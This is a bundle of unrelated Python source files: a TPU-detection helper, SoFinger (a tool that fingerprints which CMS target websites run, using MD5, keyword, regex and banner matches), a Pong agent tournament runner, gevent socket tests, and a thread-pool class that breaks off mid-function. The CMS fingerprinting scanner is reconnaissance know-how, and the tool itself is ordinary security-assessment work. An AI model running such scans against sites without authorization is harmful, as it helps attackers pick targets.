return queue.get_nowait()
except q.Empty:
traceback.print_exc()
return False
return wrapper
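# Illustrative usage (the probe function below is hypothetical, not part of this module):
#
#   @pl_multi_process
#   def _probe_tpu() -> bool:
#       return len(xm.get_xla_supported_devices("TPU")) > 0
#
#   available = _probe_tpu()  # returns False instead of blocking if the
#                             # subprocess is still hung after TPU_CHECK_TIMEOUT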
class XLADeviceUtils:
"""Used to detect the type of XLA device"""
_TPU_AVAILABLE = False
@staticmethod
@pl_multi_process
def _is_device_tpu() -> bool:
"""
Check if TPU devices are available
Return:
A boolean value indicating if TPU devices are available
"""
# For the TPU Pod training process, for example, if we have
# TPU v3-32 with 4 VMs, the world size would be 4 and as
# we would have to use `torch_xla.distributed.xla_dist` for
# multiple VMs and TPU_CONFIG won't be available, running
# `xm.get_xla_supported_devices("TPU")` won't be possible.
if xm.xrt_world_size() > 1:
return True
return len(xm.get_xla_supported_devices("TPU")) > 0
@staticmethod
def xla_available() -> bool:
"""
Check if XLA library is installed
Return:
A boolean value indicating if the XLA library is installed
"""
return _XLA_AVAILABLE
@staticmethod
def tpu_device_exists() -> bool:
"""
Runs XLA device check within a separate process
Return:
A boolean value indicating if a TPU device exists on the system
"""
if os.getenv("PL_TPU_AVAILABLE", "0") == "1":
XLADeviceUtils._TPU_AVAILABLE = True
if XLADeviceUtils.xla_available() and not XLADeviceUtils._TPU_AVAILABLE:
XLADeviceUtils._TPU_AVAILABLE = XLADeviceUtils._is_device_tpu()
if XLADeviceUtils._TPU_AVAILABLE:
os.environ["PL_TPU_AVAILABLE"] = "1"
return XLADeviceUtils._TPU_AVAILABLE
|
SoFinger.py
|
'''
@Description: SoFinger
@Author: Longlone
@LastEditors : Longlone
@Supported By : TideSec/TideFinger zerokeeper/WebEye
@Version : V0.1 Beta
@Date: 2020-01-09 09:20:34
@LastEditTime : 2020-01-14 16:00:21
'''
# TODO: add banner entries to config.txt
import argparse
from os import path, makedirs
from time import time
import multiprocessing
from general import connect, message, color
from Myplugin import Platform
CURSOR = None
CONN = None
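# Thin wrapper around the module-level cursor: executes a query and returns all
# rows, or None when the query fails, so callers can simply check the result
# instead of handling database exceptions.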
def select(sql):
global CURSOR
try:
CURSOR.execute(sql)
return CURSOR.fetchall()
except Exception:
return None
if (__name__ == '__main__'):
# --------------------------------------------
CONN, CURSOR = connect()
if (CONN is None and CURSOR is None):
message('-', ' Failed to connect to the database')
exit(1)
# --------------------------------------------
parser = argparse.ArgumentParser(
description='Check CMS for website(s).', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'url', nargs='+', help='The website URL/ The URLs File')
parser.add_argument(
'--version', action='version', version='SoFinger Version: 0.1 Beta', help='Show version and exit')
parser.add_argument('--time', nargs='?', type=int,
default=3, const=1, help=' Timeout of requests')
parser.add_argument('--thread', nargs='?', type=int,
default=20, const=1, help=' Thread number for tasks')
parser.add_argument('--retry', nargs='?', type=int,
default=1, const=1, help='Maximum number of attempts per link')
parser.add_argument(
'--verbose', help='Verbose output', action='store_true')
parser.add_argument('-s', '--silence',
help='Keep silent when running', action='store_true')
parser.add_argument(
'-f', '--fast', help='Silent mode; run all plugins at the same time via multiprocessing.', action='store_true')
args = parser.parse_args()
urls = args.url
if (len(urls) == 1 and path.isfile(urls[0])):
f = open(urls[0], 'r')
urls = f.readlines()
urls = [s.strip() for s in urls]
f.close()
fast = True if (args.fast) else False
silence = True if (args.silence or fast is True) else False
verbose = True if (args.verbose) else False
# --------------------------------------------
# if (silence is False):
# import logo
# --------------------------------------------
pf = Platform('plugins', required='run', message=True)
# for each in pf.get_messages():
# message('#', each)
preload_cms = select(
"SELECT distinct path, options FROM cms ORDER BY hit DESC")
quick_cms = select(
"SELECT name, keys, id, hit FROM fofa ORDER BY hit DESC")
md5_cms = select(
"SELECT cms_name, path, match_pattern, finger_id FROM cms WHERE options='md5' ORDER BY hit DESC")
keyword_cms = select(
"SELECT cms_name, path, match_pattern, finger_id FROM cms WHERE options='keyword' ORDER BY hit DESC")
regx_cms = select(
"SELECT cms_name, path, match_pattern, finger_id FROM cms WHERE options='regx' ORDER BY hit DESC")
# --------------------------------------------
for each_url in urls:
each_url = each_url.strip()
if ('//' in each_url):
store_path = 'Results/' + each_url.split('//')[1].replace('/', '')
else:
store_path = 'Results/' + each_url.replace('/', '')
if (not path.isdir(store_path)):
makedirs(store_path)
now = time()
message('!', 'Target URL: %s' % each_url)
# --------------------------------------------
if (fast is True):
MANAGER = multiprocessing.Manager()
ARG_DICT = MANAGER.dict()
REQUEST_DICT = MANAGER.dict()
CMS_SUCCESS = MANAGER.list()
else:
ARG_DICT = dict()
REQUEST_DICT = dict()
CMS_SUCCESS = list()
QUICK_SUCCESS = list()
ARG_DICT['timeout'] = args.time
ARG_DICT['retry'] = args.retry
ARG_DICT['thread'] = args.thread
ARG_DICT['silence'] = silence
ARG_DICT['verbose'] = verbose
ARG_DICT['fast'] = fast
# --------------------------------------------
if (fast is True): # fast mode
process_list = []
QUICK_SUCCESS = MANAGER.list()
preload_p = multiprocessing.Process(target=pf['preload'].run, args=(each_url, preload_cms, ARG_DICT, REQUEST_DICT))
preload_p.start()
try:
preload_p.join() # wait for preload to finish
except KeyboardInterrupt:
exit(1)
if ('/' in REQUEST_DICT):
quick_p = multiprocessing.Process(target=pf['quick'].run, args=(each_url, REQUEST_DICT['/'], REQUEST_DICT['headers'], quick_cms, ARG_DICT, QUICK_SUCCESS))
process_list.append(quick_p)
cms_p1 = multiprocessing.Process(target=pf['cms'].run, args=(each_url, md5_cms, 'md5', REQUEST_DICT, ARG_DICT, CMS_SUCCESS)) # MD5 check
process_list.append(cms_p1)
cms_p2 = multiprocessing.Process(target=pf['cms'].run, args=(each_url, keyword_cms, 'keyword', REQUEST_DICT, ARG_DICT, CMS_SUCCESS)) # keyword check
process_list.append(cms_p2)
cms_p3 = multiprocessing.Process(target=pf['cms'].run, args=(each_url, regx_cms, 'regx', REQUEST_DICT, ARG_DICT, CMS_SUCCESS)) # regex check
process_list.append(cms_p3)
for each in process_list:
each.start()
for each in process_list:
each.join()
else:
REQUEST_DICT = pf['preload'].run(each_url, preload_cms, ARG_DICT)
if ('STOP' in REQUEST_DICT):
exit(1)
if ('/' in REQUEST_DICT):
QUICK_SUCCESS = pf['quick'].run(each_url, REQUEST_DICT['/'], REQUEST_DICT['headers'], quick_cms, ARG_DICT)
CMS_SUCCESS.extend(pf['cms'].run(
each_url, md5_cms, 'md5', REQUEST_DICT, ARG_DICT)) # MD5 check
CMS_SUCCESS.extend(pf['cms'].run(
each_url, regx_cms, 'regx', REQUEST_DICT, ARG_DICT)) # regex check
CMS_SUCCESS.extend(pf['cms'].run(
each_url, keyword_cms, 'keyword', REQUEST_DICT, ARG_DICT)) # keyword check
# --------------------------------------------
print()
QUICK_SUCCESS = set(QUICK_SUCCESS)
CMS_SUCCESS = set(CMS_SUCCESS)
message('+', '%s %s (Check: %s)' % ('Current Task:',
color.cyan(each_url), color.yellow(store_path + '/')))
print('-' * 50)
message('+', '%s %s' % (color.red('fofa_banner:'),
color.green(' '.join(QUICK_SUCCESS))))
message('+', '%s %s' % (color.red('cms_finger:'),
color.green(' '.join(CMS_SUCCESS))))
interval = str(round(time() - now, 2))
message('+', '%s %s' %
(color.red('Total Time:'), color.blue(interval)))
print('-' * 50)
with open(store_path + '/results.txt', 'w') as f:
f.write('fofa_banner: ' + ' '.join(QUICK_SUCCESS) + '\n')
f.write('cms_finger: ' + ' '.join(CMS_SUCCESS))
CONN.close()
|
epic_battle_royale.py
|
import argparse
import sys
import os
from pong_testbench import PongTestbench
from multiprocessing import Process, Queue
from matplotlib import font_manager
from time import sleep
import importlib
import traceback
import numpy as np
import pickle
parser = argparse.ArgumentParser()
parser.add_argument("dir", type=str, help="Directory with agents.")
parser.add_argument("--render", "-r", action="store_true", help="Render the competition.")
parser.add_argument("--games", "-g", type=int, default=100, help="Number of games.")
parser.add_argument("--max_proc", "-p", type=int, default=4, help="Max number of processes.")
parser.add_argument("--start-file", "-f", type=str, default=None, help="Start file")
args = parser.parse_args()
save_file = "ebr_save.p"
def run_test(id1, agent1_dir, id2, agent2_dir, queue, games, render):
# Add the first agent to Python import path
sys.path.insert(0, agent1_dir)
orig_wd = os.getcwd()
# Import the first agent
try:
import agent
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while importing 1st agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# chdir to the directory (needed for loading the model)
# and instantiate the agent
os.chdir(agent1_dir)
try:
agent1 = agent.Agent()
agent1.load_model()
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while loading 1st agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# Go back to the original directory
os.chdir(orig_wd)
# Remove agent1 from path
del sys.path[0]
# Add the 2nd agent to path
sys.path.insert(0, agent2_dir)
# reload the agent module using agent.py from the new dir
try:
importlib.reload(agent)
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while importing 2nd agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# chdir, instantiate, cleanup (same as before)
os.chdir(agent2_dir)
try:
agent2 = agent.Agent()
agent2.load_model()
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while loading 2nd agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
os.chdir(orig_wd)
del sys.path[0]
# Get names
name1 = agent1.get_name()
name2 = agent2.get_name()
# Create and init the testbench for the agents
testbench = PongTestbench(render)
testbench.init_players(agent1, agent2)
# Run the match
try:
testbench.run_test(games)
except Exception as e:
print(f"!!! Something went wrong in {name1} ({id1}) vs {name2} ({id2})")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# Get scores and pass them to the parent process
wins1, games = testbench.get_agent_score(agent1)
wins2, games = testbench.get_agent_score(agent2)
print(f"{name1} vs {name2} finished, wins1={wins1}, wins2={wins2}")
queue.put((id1, id2, wins1, wins2, name1, name2, games))
def get_directories(top_dir):
subdir_list = []
subdir_gen = os.walk(top_dir)
# Recursively scout the directory for agents
for dir, subdirs, files in subdir_gen:
if "__pycache__" in dir:
continue
if "agent.py" not in files:
print("Warn: No agent.py found in %s. Skipping." % dir)
continue
subdir_list.append(dir)
print("%s added to directory list." % dir)
subdir_list.sort()
# Return a list of folders with agent.py
return subdir_list
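# Illustrative layout handled by get_directories() (paths are hypothetical):
# every subdirectory that contains an agent.py becomes one competitor, and
# anything else is skipped with a warning.
#
#   agents/
#       team_a/agent.py    -> included
#       team_b/agent.py    -> included
#       team_c/notes.txt   -> skipped (no agent.py)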
def epic_battle_royale(top_dir, max_proc=4):
directories = get_directories(top_dir)
names = ["__unknown__"] * len(directories)
procs = []
result_queue = Queue()
all_results = []
skipdict = []
print("Finished scanning for agents; found:", len(directories))
if args.start_file is not None:
with open(args.start_file, "rb") as f:
all_results = pickle.load(f)
for id1, id2, wins1, wins2, name1, name2, games in all_results:
print(f"Skipping {name1}:{name2} cause already played")
skipdict.append((id1, id2))
print(f"Total skipped: {len(skipdict)}")
for i1, d1 in enumerate(directories):
for i2, d2 in enumerate(directories):
if i1 == i2:
continue
if (i1, i2) in skipdict:
continue
pargs = (i1, d1, i2, d2, result_queue, args.games, args.render)
proc = Process(target=run_test, args=pargs)
procs.append(proc)
print("Living procs:", sum(p.is_alive() for p in procs))
while sum(p.is_alive() for p in procs) >= max_proc:
sleep(0.3)
print("Starting process (%d / %d)" % (i1*len(directories) + i2, len(directories)**2))
proc.start()
sleep(1)
# Join dead ones
new_p = []
for p in procs:
if not p.is_alive():
p.join(1)
else:
new_p.append(p)
procs = new_p
while result_queue.qsize() > 0:
all_results.append(result_queue.get())
with open(save_file, "wb") as f:
pickle.dump(all_results, f)
for p in procs:
try:
# Give it some final timeout. 20 sec/game is a very safe choice.
# It shouldn't happen anyway; it's there just to prevent us from
# losing all results in case of some pipes issues or a deadlock
timeout = args.games * 20
p.join(timeout)
p.terminate()
# Prevent errors in old Python versions
if hasattr(p, "kill"):
p.kill()
except Exception as e:
print("Join/Terminate/Kill error")
traceback.print_exc()
while result_queue.qsize() > 0:
all_results.append(result_queue.get())
# Aggregate the collected results into win/loss tallies
no_agents = len(directories)
games_won = np.zeros((no_agents, no_agents), dtype=np.int32)
total_games = np.zeros((no_agents, ), dtype=np.int32)
for id1, id2, wins1, wins2, name1, name2, games in all_results:
# Sanity check...
if wins1 + wins2 != games:
print(f"Wins dont sum up! {name1} vs {name2}: {wins1}+{wins2} != {games}")
games_won[id1, id2] += wins1
games_won[id2, id1] += wins2
names[id1] = name1
names[id2] = name2
total_games[id1] += games
total_games[id2] += games
# Save raw results as numpy
np.save("brres", games_won)
# Format: Wins of ROW versus COLUMN
np.savetxt("battle_royale_results.txt", games_won, fmt="%d")
np.savetxt("battle_royale_players.txt", directories, fmt="%s")
# Sum across columns to get total wins of each agent
total_wins = games_won.sum(axis=1)
# And across rows to get total losses.
total_losses = games_won.sum(axis=0)
agent_wins = list(zip(total_wins, total_losses, names, directories, total_games))
agent_wins.sort(key=lambda x: -x[0])
# Save the leaderboard
resfile = open("leaderboard.txt", "w")
print("")
print("-"*80)
print("--- LEADERBOARD ---")
for i, (wins, losses, name, dir, games) in enumerate(agent_wins):
winrate = wins/(wins+losses)
line = f"{i+1}. {name} with {wins} wins in {games} games (winrate {winrate*100:.2f}%) (from {dir})"
resfile.write(line+"\n")
print(line)
resfile.close()
print("-"*80)
print("")
print("Finished!")
if __name__ == "__main__":
epic_battle_royale(args.dir, args.max_proc)
|
thread.py
|
import data as d
import threading
d.init()
d.out()
def foo():
print("calling add_num from thread")
d.add_num(132)
t = threading.Thread(target=foo)
print("starting thread")
t.start()
print('joining to thread')
t.join()
d.out()
print('done')
|
test__socket.py
|
# This line can be commented out so that most tests run with the
# system socket for comparison.
from __future__ import print_function
from __future__ import absolute_import
from gevent import monkey
monkey.patch_all()
import sys
import array
import socket
import time
import unittest
from functools import wraps
import gevent
from gevent._compat import reraise
import gevent.testing as greentest
from gevent.testing import six
from gevent.testing import LARGE_TIMEOUT
from gevent.testing import support
from gevent.testing import params
from gevent.testing.sockets import tcp_listener
from gevent.testing.skipping import skipWithoutExternalNetwork
from gevent.testing.skipping import skipOnMacOnCI
# we use threading on purpose so that we can test both regular and
# gevent sockets with the same code
from threading import Thread as _Thread
from threading import Event
errno_types = int
class BaseThread(object):
terminal_exc = None
def __init__(self, target):
@wraps(target)
def errors_are_fatal(*args, **kwargs):
try:
return target(*args, **kwargs)
except: # pylint:disable=bare-except
self.terminal_exc = sys.exc_info()
raise
self.target = errors_are_fatal
class GreenletThread(BaseThread):
def __init__(self, target=None, args=()):
BaseThread.__init__(self, target)
self.glet = gevent.spawn(self.target, *args)
def join(self, *args, **kwargs):
return self.glet.join(*args, **kwargs)
def is_alive(self):
return not self.glet.ready()
if not monkey.is_module_patched('threading'):
class ThreadThread(BaseThread, _Thread):
def __init__(self, **kwargs):
target = kwargs.pop('target')
BaseThread.__init__(self, target)
_Thread.__init__(self, target=self.target, **kwargs)
self.start()
Thread = ThreadThread
else:
Thread = GreenletThread
class TestTCP(greentest.TestCase):
__timeout__ = None
TIMEOUT_ERROR = socket.timeout
long_data = ", ".join([str(x) for x in range(20000)])
if not isinstance(long_data, bytes):
long_data = long_data.encode('ascii')
def setUp(self):
super(TestTCP, self).setUp()
if '-v' in sys.argv:
printed = []
try:
from time import perf_counter as now
except ImportError:
from time import time as now
def log(*args):
if not printed:
print()
printed.append(1)
print("\t -> %0.6f" % now(), *args)
orig_cot = self._close_on_teardown
def cot(o):
log("Registering for teardown", o)
def c(o=o):
log("Closing on teardown", o)
o.close()
o = None
orig_cot(c)
return o
self._close_on_teardown = cot
else:
def log(*_args):
"Does nothing"
self.log = log
self.listener = self._close_on_teardown(self._setup_listener())
# It is important to watch the lifetimes of socket objects and
# ensure that:
# (1) they are closed; and
# (2) *before* the next test begins.
#
# For example, it's a bad bad thing to leave a greenlet running past the
# scope of the individual test method if that greenlet will close
# a socket object --- especially if that socket object might also have been
# closed explicitly.
#
# On Windows, we've seen issue with filenos getting reused while something
# still thinks they have the original fileno around. When they later
# close that fileno, a completely unrelated object is closed.
self.port = self.listener.getsockname()[1]
def _setup_listener(self):
return tcp_listener()
def create_connection(self, host=None, port=None, timeout=None,
blocking=None):
sock = self._close_on_teardown(socket.socket())
sock.connect((host or params.DEFAULT_CONNECT, port or self.port))
if timeout is not None:
sock.settimeout(timeout)
if blocking is not None:
sock.setblocking(blocking)
return sock
def _test_sendall(self, data, match_data=None, client_method='sendall',
**client_args):
# pylint:disable=too-many-locals,too-many-branches,too-many-statements
log = self.log
log("test_sendall using method", client_method)
read_data = []
accepted_event = Event()
def accept_and_read():
log("\taccepting", self.listener)
conn, _ = self.listener.accept()
try:
with conn.makefile(mode='rb') as r:
log("\taccepted on server; client conn is", conn, "file is", r)
accepted_event.set()
log("\treading")
read_data.append(r.read())
log("\tdone reading", r, "got bytes", len(read_data[0]))
del r
finally:
conn.close()
del conn
server = Thread(target=accept_and_read)
try:
log("creating client connection")
client = self.create_connection(**client_args)
# It's important to wait for the server to fully accept before
# we shutdown and close the socket. In SSL mode, the number
# and timing of data exchanges to complete the handshake and
# thus exactly when greenlet switches occur, varies by TLS version.
#
# It turns out that on < TLS1.3, we were getting lucky and the
# server was the greenlet that raced ahead and blocked in r.read()
# before the client returned from create_connection().
#
# But when TLS 1.3 was deployed (OpenSSL 1.1), the *client* was the
# one that raced ahead while the server had yet to return from
# self.listener.accept(). So the client sent the data to the socket,
# and closed, before the server could do anything, and the server,
# when it got switched to by server.join(), found its new socket
# dead.
accepted_event.wait()
log("Client got accepted event from server", client, "; sending data", len(data))
try:
x = getattr(client, client_method)(data)
log("Client sent data: result from method", x)
finally:
log("Client will unwrap and shutdown")
if hasattr(client, 'unwrap'):
# Are we dealing with an SSLSocket? If so, unwrap it
# before attempting to shut down the socket. This does the
# SSL shutdown handshake and (hopefully) stops ``accept_and_read``
# from generating ``ConnectionResetError`` on AppVeyor.
try:
client = client.unwrap()
except ValueError:
pass
try:
# The implicit reference-based nastiness of Python 2
# sockets interferes, especially when using SSL sockets.
# The best way to get a decent FIN to the server is to shutdown
# the output. Doing that on Python 3, OTOH, is contraindicated
# except on PyPy, so this used to read ``PY2 or PYPY``. But
# it seems that a shutdown is generally good practice, and I didn't
# document what errors we saw without it. Per issue #1637
# lets do a shutdown everywhere, but only after removing any
# SSL wrapping.
client.shutdown(socket.SHUT_RDWR)
except (OSError, socket.error):
pass
log("Client will close")
client.close()
finally:
server.join(10)
assert not server.is_alive()
if server.terminal_exc:
reraise(*server.terminal_exc)
if match_data is None:
match_data = self.long_data
read_data = read_data[0].split(b',')
match_data = match_data.split(b',')
self.assertEqual(read_data[0], match_data[0])
self.assertEqual(len(read_data), len(match_data))
self.assertEqual(read_data, match_data)
def test_sendall_str(self):
self._test_sendall(self.long_data)
if six.PY2:
def test_sendall_unicode(self):
self._test_sendall(six.text_type(self.long_data))
@skipOnMacOnCI("Sometimes fails for no apparent reason (buffering?)")
def test_sendall_array(self):
data = array.array("B", self.long_data)
self._test_sendall(data)
def test_sendall_empty(self):
data = b''
self._test_sendall(data, data)
def test_sendall_empty_with_timeout(self):
# Issue 719
data = b''
self._test_sendall(data, data, timeout=10)
def test_sendall_nonblocking(self):
# https://github.com/benoitc/gunicorn/issues/1282
# Even if the socket is non-blocking, we make at least
# one attempt to send data. Under Py2 before this fix, we
# would incorrectly immediately raise a timeout error
data = b'hi\n'
self._test_sendall(data, data, blocking=False)
def test_empty_send(self):
# Issue 719
data = b''
self._test_sendall(data, data, client_method='send')
def test_fullduplex(self):
N = 100000
def server():
remote_client, _ = self.listener.accept()
self._close_on_teardown(remote_client)
# start reading, then, while reading, start writing. the reader should not hang forever
sender = Thread(target=remote_client.sendall,
args=((b't' * N),))
try:
result = remote_client.recv(1000)
self.assertEqual(result, b'hello world')
finally:
sender.join()
server_thread = Thread(target=server)
client = self.create_connection()
client_file = self._close_on_teardown(client.makefile())
client_reader = Thread(target=client_file.read, args=(N, ))
time.sleep(0.1)
client.sendall(b'hello world')
time.sleep(0.1)
# close() used to hang
client_file.close()
client.close()
# this tests "full duplex" bug;
server_thread.join()
client_reader.join()
def test_recv_timeout(self):
def accept():
# make sure the conn object stays alive until the end;
# premature closing triggers a ResourceWarning and
# EOF on the client.
conn, _ = self.listener.accept()
self._close_on_teardown(conn)
acceptor = Thread(target=accept)
client = self.create_connection()
try:
client.settimeout(1)
start = time.time()
with self.assertRaises(self.TIMEOUT_ERROR):
client.recv(1024)
took = time.time() - start
self.assertTimeWithinRange(took, 1 - 0.1, 1 + 0.1)
finally:
acceptor.join()
# Subclasses can disable this
_test_sendall_timeout_check_time = True
# Travis-CI container infrastructure is configured with
# large socket buffers, at least 2MB, as-of Jun 3, 2015,
# so we must be sure to send more data than that.
# In 2018, this needs to be increased *again* as a smaller value was
# still often being sent.
_test_sendall_data = b'hello' * 100000000
# This doesn't make much sense...why are we really skipping this?
@greentest.skipOnWindows("On Windows send() accepts whatever is thrown at it")
def test_sendall_timeout(self):
client_sock = []
acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
client = self.create_connection()
time.sleep(0.1)
assert client_sock
client.settimeout(0.1)
start = time.time()
try:
with self.assertRaises(self.TIMEOUT_ERROR):
client.sendall(self._test_sendall_data)
if self._test_sendall_timeout_check_time:
took = time.time() - start
self.assertTimeWithinRange(took, 0.09, 0.2)
finally:
acceptor.join()
client.close()
client_sock[0][0].close()
def test_makefile(self):
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.flush()
fd.close()
conn.close() # for pypy
acceptor = Thread(target=accept_once)
try:
client = self.create_connection()
# Closing the socket doesn't close the file
client_file = client.makefile(mode='rb')
client.close()
line = client_file.readline()
self.assertEqual(line, b'hello\n')
self.assertEqual(client_file.read(), b'')
client_file.close()
finally:
acceptor.join()
def test_makefile_timeout(self):
def accept_once():
conn, _ = self.listener.accept()
try:
time.sleep(0.3)
finally:
conn.close() # for pypy
acceptor = Thread(target=accept_once)
try:
client = self.create_connection()
client.settimeout(0.1)
fd = client.makefile(mode='rb')
self.assertRaises(self.TIMEOUT_ERROR, fd.readline)
client.close()
fd.close()
finally:
acceptor.join()
def test_attributes(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
self.assertEqual(socket.AF_INET, s.family)
self.assertEqual(socket.SOCK_DGRAM, s.type)
self.assertEqual(0, s.proto)
if hasattr(socket, 'SOCK_NONBLOCK'):
s.settimeout(1)
self.assertEqual(socket.SOCK_DGRAM, s.type)
s.setblocking(0)
std_socket = monkey.get_original('socket', 'socket')(socket.AF_INET, socket.SOCK_DGRAM, 0)
try:
std_socket.setblocking(0)
self.assertEqual(std_socket.type, s.type)
finally:
std_socket.close()
s.close()
def test_connect_ex_nonblocking_bad_connection(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.setblocking(False)
ret = s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, support.find_unused_port()))
self.assertIsInstance(ret, errno_types)
finally:
s.close()
@skipWithoutExternalNetwork("Tries to resolve hostname")
def test_connect_ex_gaierror(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
with self.assertRaises(socket.gaierror):
s.connect_ex(('foo.bar.fizzbuzz', support.find_unused_port()))
finally:
s.close()
def test_connect_ex_nonblocking_overflow(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.setblocking(False)
with self.assertRaises(OverflowError):
s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, 65539))
finally:
s.close()
@unittest.skipUnless(hasattr(socket, 'SOCK_CLOEXEC'),
"Requires SOCK_CLOEXEC")
def test_connect_with_type_flags_ignored(self):
# Issue 944
# If we have SOCK_CLOEXEC or similar, we shouldn't be passing
# them through to the getaddrinfo call that connect() makes
SOCK_CLOEXEC = socket.SOCK_CLOEXEC # pylint:disable=no-member
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM | SOCK_CLOEXEC)
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.close()
conn.close()
acceptor = Thread(target=accept_once)
try:
s.connect((params.DEFAULT_CONNECT, self.port))
fd = s.makefile(mode='rb')
self.assertEqual(fd.readline(), b'hello\n')
fd.close()
s.close()
finally:
acceptor.join()
class TestCreateConnection(greentest.TestCase):
__timeout__ = LARGE_TIMEOUT
def test_refuses(self, **conn_args):
connect_port = support.find_unused_port()
with self.assertRaisesRegex(
socket.error,
# We really expect "connection refused". It's unclear
# where/why we would get '[errno -2] name or service
# not known' but it seems some systems generate that.
# https://github.com/gevent/gevent/issues/1389 Somehow
# extremly rarely we've also seen 'address already in
# use', which makes even less sense. The manylinux
# 2010 environment produces 'errno 99 Cannot assign
# requested address', which, I guess?
'refused|not known|already in use|assign'
):
socket.create_connection(
(greentest.DEFAULT_BIND_ADDR, connect_port),
timeout=30,
**conn_args
)
def test_refuses_from_port(self):
source_port = support.find_unused_port()
# Usually we don't want to bind/connect to '', but
# using it as the source is required if we don't want to hang,
# at least on some systems (OS X)
self.test_refuses(source_address=('', source_port))
@greentest.ignores_leakcheck
@skipWithoutExternalNetwork("Tries to resolve hostname")
def test_base_exception(self):
# such as a GreenletExit or a gevent.timeout.Timeout
class E(BaseException):
pass
class MockSocket(object):
created = ()
closed = False
def __init__(self, *_):
MockSocket.created += (self,)
def connect(self, _):
raise E(_)
def close(self):
self.closed = True
def mockgetaddrinfo(*_):
return [(1, 2, 3, 3, 5),]
import gevent.socket as gsocket
# Make sure we're monkey patched
self.assertEqual(gsocket.create_connection, socket.create_connection)
orig_socket = gsocket.socket
orig_getaddrinfo = gsocket.getaddrinfo
try:
gsocket.socket = MockSocket
gsocket.getaddrinfo = mockgetaddrinfo
with self.assertRaises(E):
socket.create_connection(('host', 'port'))
self.assertEqual(1, len(MockSocket.created))
self.assertTrue(MockSocket.created[0].closed)
finally:
MockSocket.created = ()
gsocket.socket = orig_socket
gsocket.getaddrinfo = orig_getaddrinfo
class TestFunctions(greentest.TestCase):
@greentest.ignores_leakcheck
# Creating new types in the function takes a cycle to cleanup.
def test_wait_timeout(self):
# Issue #635
from gevent import socket as gsocket
class io(object):
callback = None
def start(self, *_args):
gevent.sleep(10)
with self.assertRaises(gsocket.timeout):
gsocket.wait(io(), timeout=0.01) # pylint:disable=no-member
def test_signatures(self):
# https://github.com/gevent/gevent/issues/960
exclude = []
if greentest.PYPY:
# Up through at least PyPy 5.7.1, they define these as
# gethostbyname(host), whereas the official CPython argument name
# is hostname. But cpython doesn't allow calling with keyword args.
# Likewise for gethostbyaddr: PyPy uses host, cpython uses ip_address
exclude.append('gethostbyname')
exclude.append('gethostbyname_ex')
exclude.append('gethostbyaddr')
self.assertMonkeyPatchedFuncSignatures('socket', exclude=exclude)
def test_resolve_ipv6_scope_id(self):
from gevent import _socketcommon as SC
if not SC.__socket__.has_ipv6:
self.skipTest("Needs IPv6") # pragma: no cover
if not hasattr(SC.__socket__, 'inet_pton'):
self.skipTest("Needs inet_pton") # pragma: no cover
# A valid IPv6 address, with a scope.
addr = ('2607:f8b0:4000:80e::200e', 80, 0, 9)
# Mock socket
class sock(object):
family = SC.AF_INET6 # pylint:disable=no-member
self.assertIs(addr, SC._resolve_addr(sock, addr))
class TestSocket(greentest.TestCase):
def test_shutdown_when_closed(self):
# https://github.com/gevent/gevent/issues/1089
# we once raised an AttributeError.
s = socket.socket()
s.close()
with self.assertRaises(socket.error):
s.shutdown(socket.SHUT_RDWR)
if __name__ == '__main__':
greentest.main()
|
threadpoolexecutor.py
|
#!/usr/bin/env python
import logging
import os
from Queue import Queue
from threading import Thread, Condition
DEFAULT_NUMBER_OF_THREADS = 8
def get_number_of_cpus():
"""
Retrieves the number of available processors/cores/threads that can be used.
Uses the API from the os package. If this information cannot be retrieved,
returns the default value stored in DEFAULT_NUMBER_OF_THREADS constant.
:return: The number of available processors/cores/threads.
"""
try:
return os.sysconf("SC_NPROCESSORS_ONLN")
except Exception:
return DEFAULT_NUMBER_OF_THREADS
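# Note: multiprocessing.cpu_count() exposes essentially the same information;
# os.sysconf("SC_NPROCESSORS_ONLN") is queried directly here, wrapped so that
# platforms where the value cannot be determined fall back to the default above.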
class ThreadPoolExecutorState(object):
"""
Represents the different states of the ThreadPoolExecutor class.
"""
NOT_STARTED = 1
RUNNING = 2
STOPPING = 3
STOPPED = 4
class ThreadPoolExecutor(object):
"""
Creates a pool of threads that can be reused for multiple tasks. The tasks are submitted to the executor,
which is responsible for delivering them to the worker threads. The API allows its client to block until
the task execution completes or to continue its work while the threads are doing their job in the background.
A simple example of usage is as follows:
def task1(value):
...
def task2(value):
...
executor = ThreadPoolExecutor(16)
executor.start()
...
executor.submit(task1, value1)
executor.submit(task1, value2)
executor.submit(task2, value3)
executor.submit(task2, value4)
...
executor.shutdown(True)
"""
def __init__(self, size=get_number_of_cpus()):
self._queue = Queue()
self._size = size
self._pool = []
self._lock = Condition()
self._state = ThreadPoolExecutorState.NOT_STARTED
def execute_task():
while True:
with self._lock:
if self._state == ThreadPoolExecutorState.RUNNING:
if not self._queue.empty():
task, args = self._queue.get(False)
else:
